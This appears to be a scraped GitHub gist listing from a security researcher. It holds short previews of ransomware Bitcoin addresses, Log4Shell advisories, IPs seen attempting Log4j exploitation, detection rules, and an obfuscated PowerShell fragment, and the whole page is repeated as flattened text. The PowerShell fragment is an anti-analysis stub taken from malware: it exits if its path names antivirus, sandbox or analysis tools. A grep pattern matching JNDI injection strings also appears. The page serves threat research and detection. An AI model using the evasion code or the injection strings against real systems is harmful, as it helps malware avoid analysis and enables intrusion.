Dan danzek

## ESXi ransomware payment addresses
15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U

## Get-TwitterThread.ps1
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json

$currentThread = ""
foreach($currentTweetJson in $tweets)
{
    $currentTweet = $currentTweetJson.tweet

    if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
    {

## gist:352b309a576a1654c6588eb9dcba6d9d
 $Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s');   Set  ("{1}{0}"-f'e','PdWj')  ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ;  ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"

if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast'))    {exit}
if (${SCR`IP`TP`ATh} -match "avg")      {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp'))   {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a'))  {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo'))  {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus'))    {exit}

## checkmk.py
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

## get_apple_oss.sh
#!/bin/zsh

: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token
'

APPLE_OSS_DIR="all_apple_oss_archives"
APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt"

## log4j_exploitation_attempts_crowdsec.csv

          
            ip
            status
            country
            as_name

            
              193.46.254.155
              validated
              RO
              Unmanaged Ltd

            
              59.1.226.211
              validated
              KR
              Korea Telecom

            
              192.99.62.110
              validated
              CA
              OVH SAS

            
              209.141.50.153
              validated
              US
              PONYNET

            
              188.68.61.6
              validated
              DE
              netcup GmbH

            
              85.51.24.68
              validated
              ES
              Orange Espagne SA

            
              45.95.55.138
              validated
              DE
              LUMASERV Systems

            
              148.71.35.230
              validated
              PT
              Vodafone Portugal - Communicacoes Pessoais S.A.

            
              85.51.217.156
              validated
              ES
              Orange Espagne SA

## 20211210-TLP-WHITE_LOG4J.md

      
              1 file
            
          
              92 forks
            
          
              733 comments
            
          
              1096 stars
            
          
                SwitHak
                / 20211210-TLP-WHITE_LOG4J.md
            
            
              Last active
              May 22, 2023 18:58
            
              
                BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
              
          
      View 20211210-TLP-WHITE_LOG4J.md
  
      
    Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
Errors, typos, something to say ?

If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List


## log4j_rce_detection.md

      
              1 file
            
          
              74 forks
            
          
              70 comments
            
          
              511 stars
            
          
                Neo23x0
                / log4j_rce_detection.md
            
            
              Last active
              April 12, 2023 11:09
            
              
                Log4j RCE CVE-2021-44228 Exploitation Detection
              
          
      View log4j_rce_detection.md
  
      
    log4j RCE Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

  
## noappinstaller.reg
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\ms-appinstaller]
"URL Protocol"=-

## EQL hunt for Potential Macro on close
sequence by host.id with maxspan=1s
   [process where event.action : "creation_event" and
    process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
    not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
            process.args_count >= 2)
    ] by process.parent.entity_id
   [process where event.action : "termination_event" and
    process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
    process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
    ] by process.entity_id
	15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
	1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
	1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
	1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
	1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
	1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
	1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
	14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
	145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
	1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U
	$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
	$tweets = $tweetJson \| ConvertFrom-Json

	$currentThread = ""
	foreach($currentTweetJson in $tweets)
	{
	$currentTweet = $currentTweetJson.tweet

	if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
	{
	$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"

	if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
	if (${SCR`IP`TP`ATh} -match "avg") {exit}
	if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
	if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
	if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
	if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
	if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
	from hashlib import md5, sha1
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend
	from base64 import b64encode, b64decode
	import sys, time
	import requests

	DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

	class PanCrypt():
	#!/bin/zsh

	: '
	You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
	https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api
	https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token
	'

	APPLE_OSS_DIR="all_apple_oss_archives"
	APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt"
ip	status	country	as_name
193.46.254.155	validated	RO	Unmanaged Ltd
59.1.226.211	validated	KR	Korea Telecom
192.99.62.110	validated	CA	OVH SAS
209.141.50.153	validated	US	PONYNET
188.68.61.6	validated	DE	netcup GmbH
85.51.24.68	validated	ES	Orange Espagne SA
45.95.55.138	validated	DE	LUMASERV Systems
148.71.35.230	validated	PT	Vodafone Portugal - Communicacoes Pessoais S.A.
85.51.217.156	validated	ES	Orange Espagne SA
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Classes\ms-appinstaller]
	"URL Protocol"=-
	sequence by host.id with maxspan=1s
	[process where event.action : "creation_event" and
	process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
	not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
	process.args_count >= 2)
	] by process.parent.entity_id
	[process where event.action : "termination_event" and
	process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
	process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
	] by process.entity_id